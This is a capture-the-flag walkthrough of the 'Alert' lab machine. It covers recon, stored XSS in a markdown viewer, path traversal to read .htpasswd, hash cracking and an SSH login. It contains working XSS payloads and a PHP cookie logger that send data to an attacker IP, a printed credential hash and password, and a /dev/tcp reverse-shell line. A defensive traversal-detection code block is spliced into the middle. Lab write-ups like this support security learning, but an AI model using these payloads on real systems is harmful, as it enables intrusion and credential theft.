Linux - Easy - Alert

Recon

$nmap -p- -A 10.129.128.120
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
12227/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$whatweb alert.htb
http://alert.htb [302 Found] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], RedirectLocation[index.php?page=alert], Title[Alert - Markdown Viewer]
http://alert.htb/index.php?page=alert [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], Title[Alert - Markdown Viewer]
$gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://domain.htb --append-domain -t 150
Found: statistics.alert.htb Status: 401 [Size: 467]

statistics.alert.htb

Markdown visualizer

After uploading a file, we can view it at /visualizer.php.

Using the share button, we can get the name of our file on the server.

Testing further, adding <script>alert(1)</script> to our file pops the alert(1) dialog, so the viewer renders raw HTML from the uploaded markdown.

I was fighting with XSS to execute my file for a while, but no go. I've managed to download files from my server, but not execute them. I worked on stealing cookies later, but it does

# Test markdown

<script src="http://10.10.16.6/script.js"></script>

script.js:

new Image().src='http://10.10.16.6/index.php?c='+document.cookie

index.php on the attacker host:

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

I tried like a moron to get user data, and got mine.

# Test markdown

<script src="http://10.10.16.6/script.js"></script>

<script>
const data = {
    cookies: document.cookie,
    userAgent: navigator.userAgent,
    url: window.location.href,
    referrer: document.referrer,
    platform: navigator.platform
};

fetch('http://10.10.16.6/', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(data)
});
</script>

But this gave me an idea: I could use the support page and embed, in the message, a link to the site with the XSS as an image. So I've created another markdown file.

# Test markdown

<script>
fetch("http://alert.htb/")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.16.6/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("xss error:", error));
</script>

Then click share to get the link, submit the message to support, and we finally get data.

Then we can decode the contents using CyberChef.

Progress. Then I've tried path traversal on the messages file, with the URL http://alert.htb/messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf

Then we can read the .htpasswd of the statistics vhost at http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd.
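A defender-side view of the messages.php?file= traversal above, as an added example that is not part of the original writeup: a containment check that a file-serving handler should apply (shown in Python rather than the site's PHP), plus a detector run over constructed Apache access-log lines modelled on the requests in this writeup. MESSAGES_DIR is an assumed location.

```python
import os
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical location of the stored support messages; the real box's layout is not known.
MESSAGES_DIR = "/var/www/alert.htb/messages"


def safe_message_path(base_dir, user_file):
    """Resolve a ?file= value against base_dir and refuse anything that escapes it.

    Returns the canonical absolute path, or None when the request would read
    outside base_dir (the ../../../../etc/apache2/... trick used on this page).
    """
    base = os.path.realpath(base_dir)
    # Join first, then canonicalise so '..' segments and symlinks collapse.
    candidate = os.path.realpath(os.path.join(base, user_file))
    # The os.sep suffix stops /var/www/messages_evil from matching /var/www/messages.
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def flag_traversal(log_line):
    """True when an Apache combined-log line carries a traversal-looking query value.

    The request target is percent-decoded twice so %2e%2e%2f and double-encoded
    variants are caught before the '../' and absolute-path checks run.
    """
    try:
        request = log_line.split('"')[1]   # e.g. 'GET /messages.php?file=x HTTP/1.1'
        target = request.split()[1]
    except IndexError:
        return False
    query = parse_qs(urlsplit(unquote(unquote(target))).query)
    for values in query.values():
        for v in values:
            if "../" in v or "..\\" in v or v.startswith("/"):
                return True
    return False


def suspicious_lines(lines):
    return [line for line in lines if flag_traversal(line)]


# Constructed sample log lines modelled on the requests in this writeup.
SAMPLE_LOG = [
    '10.10.16.6 - - [01/Jan/2025:10:00:00 +0000] "GET /messages.php?file=2024-03-10_14-00-00.txt HTTP/1.1" 200 512',
    '10.10.16.6 - - [01/Jan/2025:10:00:01 +0000] "GET /messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1024',
    '10.10.16.6 - - [01/Jan/2025:10:00:02 +0000] "GET /messages.php?file=..%252F..%252F..%252Fvar%252Fwww%252Fstatistics.alert.htb%252F.htpasswd HTTP/1.1" 200 60',
]
```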

We got the user and hash: albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ. (the trailing dot is part of the hash). This hash is not on CrackStation, so we run hashcat with hashcat -m 1600 test.hash /usr/share/wordlists/rockyou.txt (mode 1600 is Apache $apr1$ MD5) and we get manchesterunited.

We can then log in to the site http://statistics.alert.htb.

The same works for ssh! We are in.

Priv Esc

Running simple enumeration, we can see that something is listening on port 8080.

Running wget and cat shows us that it is a Website Monitor, so that is probably our target. Let's forward it back to us with ssh -L 8080:localhost:8080 albert@alert.htb.

If we then go to /opt we can see website-monitor. It has only one folder that belongs to the management group. Fortunately we are in this group: uid=1000(albert) gid=1000(albert) groups=1000(albert),1001(management).

We can then modify it with exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'"); so we get a reverse shell.

<?php
define('PATH', '/opt/website-monitor');
exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'");
?>

We are done.